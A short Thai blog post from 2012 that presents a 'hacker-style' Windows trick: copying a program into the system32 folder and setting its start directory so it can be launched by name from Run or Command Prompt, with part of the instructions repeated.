แล้วผมก็ไม่รู้เหมือนคนโดนแบบผม แล้วถ้าขายคอมพิวเตอร์ด้วยแล้ว จะต้องดับวูวไปเลยหรือเปล่า
และสิ่งก็เป็นที่มาของความอยากรู้เกี่ยวกับการ hacker
คอมเครื่องที่ผมใช้อยู่นี้ผมก็ซื้อมาใหม่ ใช้ได้ วันสองวัน ก็โดนซ่ะแล้ว คอมเครื่องเก่า harddisk พังยังไม่ได้ไปซ่อม
ข้อมูลจาก ruk-com.in.th
วันพุธที่ 25 มกราคม พ.ศ. 2555
วิธีเรียกใช้โปรแกรม แบบ Hacker
เอาโปรแกรมที่คุณคิดว่าใช้งานบ่อยเป็นประจำไปใส่ไว้ที่ C:\WINDOWS\system32
http://upic.me/show/30585785
แล้ว click ที่ properties ในช่อง Start in ให้คุณใส่ข้อความดังนี้ %HOMEDRIVE%%HOMEPATH%
http://upic.me/show/30585808
จากนั้นคุณก็ click ที่ Apply แล้วก็ click OK
พอคุณจะใช้โปรแกรม คุณก็รัน ชื่อโปรแกรมคุณเลย แล้วโปรแกรมก็จะเด้งขึ้นมา
http://upic.me/show/30585832
หรืออีกวิธี คุณก็เข้า Command Promt แล้ว พิมพ์ start ชื่อโปรแกรมของคุณ
http://upic.me/show/30585896
จากนั้นโปรแกรมก็จะเด้งขึ้นมา
http://upic.me/show/30585928
;) ;)
:D :Dแนว Hacker มั้ยครับ พวกพี่ๆน้องๆ ชื่อไฟล์โปรแกรมผมเปลี่ยนเป็นรหัส 110101 ;D ;D
ข้อมูลจาก ruk-com.in.th
http://upic.me/show/30585785
แล้ว click ที่ properties ในช่อง Start in ให้คุณใส่ข้อความดังนี้ %HOMEDRIVE%%HOMEPATH%
http://upic.me/show/30585808
จากนั้นคุณก็ click ที่ Apply แล้วก็ click OK
พอคุณจะใช้โปรแกรม คุณก็รัน ชื่อโปรแกรมคุณเลย แล้วโปรแกรมก็จะเด้งขึ้นมา
http://upic.me/show/30585832
หรืออีกวิธี คุณก็เข้า Command Promt แล้ว พิมพ์ start ชื่อโปรแกรมของคุณ
http://upic.me/show/30585896
จากนั้นโปรแกรมก็จะเด้งขึ้นมา
http://upic.me/show/30585928
;) ;)
:D :Dแนว Hacker มั้ยครับ พวกพี่ๆน้องๆ ชื่อไฟล์โปรแกรมผมเปลี่ยนเป็นรหัส 110101 ;D ;D
ข้อมูลจาก ruk-com.in.th
สมัครสมาชิก:
บทความ (Atom)